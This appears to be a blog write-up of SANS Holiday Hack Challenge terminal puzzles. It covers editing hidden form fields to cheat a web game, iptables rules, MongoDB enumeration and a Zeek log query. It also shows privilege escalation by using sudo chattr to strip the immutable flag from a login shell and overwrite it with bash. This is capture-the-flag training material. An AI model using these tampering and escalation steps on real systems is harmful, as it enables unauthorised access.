$gas = @{O=6;H=7;He=3;N=4;Ne=22;Ar=11;Xe=10;F=20;Kr=8;Rn=9}
(Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $gas).RawContent
Holiday Hack Trail — Minty Candy Cane
After playing around for a bit in the game, I found some hidden fields in the HTML. I also noticed these were used in the form POST submitted to the server.
Editing these and submitting your next move in the game appears to work, as there are no server-side checks.
I set my difficulty to 1 and distance to 8000, pressed go and instantly won!
I’m pretty sure there is more to this. Maybe on medium and hard, you need to exploit the web app in different ways?
Smart Braces — Kent Tinseltooth
This is a simple iptables challenge. We are given rules that need to be implemented, in the file /home/elfuuser/IOTteethBraces.md:
1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.
Answer:
sudo iptables -P INPUT DROP
sudo iptables -P FORWARD DROP
sudo iptables -P OUTPUT DROP
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 -j ACCEPT
sudo iptables -A OUTPUT -p tcp -d 172.19.0.225 --sport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp -m multiport --dports 21,80 -j ACCEPT
sudo iptables -A OUTPUT -p tcp -m multiport --sports 21,80 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -i lo -j ACCEPT
Mongo Pilfter — Holly Evergreen
Let's start by running the list databases command.
mongo --quiet --eval "printjson(db.adminCommand('listDatabases'))"
It indicates that it is the wrong port. I ran netstat to see which ports are listening, which shows port 12121. Let's try connecting to port 12121 this time. Here are the important commands to get to the solution!
Answer:
elf@ac1a0418369d:~$ mongo -host localhost:12121
> show dbs
admin 0.000GB
elfu 0.000GB
local 0.000GB
test 0.000GB
> use elfu
switched to db elfu
> show collections
bait
chum
line
metadata
solution
system.js
tackle
tincan
> db.solution.find();
{ "_id" : "You did good! Just run the command between the stars: ** db.loadServerScripts();displaySolution(); **" }
> db.loadServerScripts();displaySolution();
Nyanshell — Alabaster Snowball
When you try to log in with the supplied creds, it greets you with a bash animation, but that is not what we want.
As one of the hints suggests, on Linux, a user’s shell is determined by the contents of /etc/passwd. We are also told by Alabaster, that the account can use sudo.
Running sudo -l will tell us what we have privileges to run for.
If you cat /etc/passwd, you can also see that alabaster_snowball's shell is set to /bin/nsh. Let's try using chattr, as our account can run it with sudo.
List attributes
elf@c3e5163986da:~$ lsattr /etc/passwd
--------------e---- /etc/passwd
If we can't edit the passwd file, then maybe we can edit the shell. Running the same command on the nsh shell shows that it has the immutable flag (i):
elf@b3917701d002:~$ lsattr /bin/nsh
----i---------e---- /bin/nsh
Run chattr with sudo to remove the immutable flag from the file.
elf@b3917701d002:~$ sudo chattr -i /bin/nsh
Now we can edit this binary. Let's replace it with a copy of /bin/bash and try logging in again.
elf@c544bf914610:~$ cp /bin/bash /bin/nsh
elf@c544bf914610:~$ su alabaster_snowball
Password: Password2
Loading, please wait......
You did it! Congratulations!
Zeek JSON Logs — Wunorse Openslae
Identify the destination IP address with the longest connection duration.
Instead of bro-cut, this time we need to use jq. The conn.log has a duration field that we need to filter on to find the longest connection.
Answer: 13.107.21.200
Thanks to SANS for organising the Holiday Hack Challenge! I look forward to doing it next year.